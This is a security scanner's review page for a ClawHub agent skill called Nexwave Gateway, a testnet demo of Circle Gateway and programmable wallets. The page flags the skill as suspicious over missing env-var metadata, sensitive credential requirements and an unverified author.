Back to skill
Skillv1.0.2
ClawScan security
Nexwave Gateway · ClawHub's context-aware review of the artifact, metadata, and declared behavior.
Scanner verdict
SuspiciousFeb 11, 2026, 9:17 AM
- Verdict
- suspicious
- Confidence
- medium
- Model
- gpt-5-mini
- Summary
- The skill's code and instructions largely match its stated purpose (Circle Gateway / programmable wallets), but there are metadata inconsistencies, sensitive credentials are required, and the author/source is unverified — review before use.
- Guidance
- This package implements exactly what it says: a testnet demo of Circle Gateway + Circle Programmable (MPC) wallets. However: 1) The skill requires sensitive Circle developer credentials (API key, entity secret, wallet set ID) — these grant the ability to create/sign transactions and should never be uploaded to untrusted systems or used with real/mainnet funds until you fully trust the code and author. 2) The registry metadata omitted the required env vars; that mismatch suggests sloppy packaging — review the SKILL.md and code before running. 3) Confirm the author (nexwave) and owner, and prefer running the setup and scripts in an isolated environment (container or VM) and on testnets first. 4) Inspect the included JS files yourself (they are present) and verify endpoints (Circle Gateway testnet URL, Circle SDK, Arc RPC) are correct. If you are not comfortable with handling API secrets or signing transactions via a third-party service, do not install or supply credentials.
Review Dimensions
- Purpose & Capability
- noteThe skill claims to provide unified USDC access via Circle Gateway and Circle Programmable Wallets and the code, SKILL.md, and README all implement that flow (Gateway API client, EIP-712 typed data, Circle MPC wallet SDK). Requesting CIRCLE_API_KEY, CIRCLE_ENTITY_SECRET, and CIRCLE_WALLET_SET_ID is expected for this purpose. However, the registry metadata at the top of the package lists "Required env vars: none" while the SKILL.md and code clearly require those env vars — an inconsistency in the manifest/metadata.
- Instruction Scope
- okRuntime instructions are scoped to the Gateway use-case: run setup.sh, install Node deps, run check-balance.js / deposit.js / transfer.js. The SKILL.md and scripts only reference Circle credentials, Gateway API, and RPC endpoints needed for supported testnets. There are no instructions to read unrelated local files, the shell history, or arbitrary system configuration.
- Install Mechanism
- okThere is no remote download of arbitrary archives; setup.sh runs npm install for known packages (viem, dotenv, @circle-fin/developer-controlled-wallets) and copies the included JS files into a gateway-app directory. This is a typical local project setup. Risk is moderate because running setup.sh will write files and install Node packages — but the packages are standard and the script does not fetch code from unknown URLs.
- Credentials
- concernThe skill requires developer-level Circle credentials (CIRCLE_API_KEY, CIRCLE_ENTITY_SECRET, CIRCLE_WALLET_SET_ID) which legitimately enable the described behavior but are highly sensitive: they allow creating wallets, signing transactions via Circle's API, and moving funds. The requirement is proportionate to the functionality, but because the author/source is unverified and the package metadata omitted these env vars, users should treat the credentials as high-risk and avoid using production/mainnet funds without full trust and review. setup.sh also creates a local .env template — ensure it is stored securely.
- Persistence & Privilege
- okThe skill does not request always:true, does not modify other skills, and won't be force-included. It copies files into a local gateway-app directory and creates a .env template when you run setup.sh — expected for a local demo app. There is no evidence it alters global agent settings or other skills' configurations.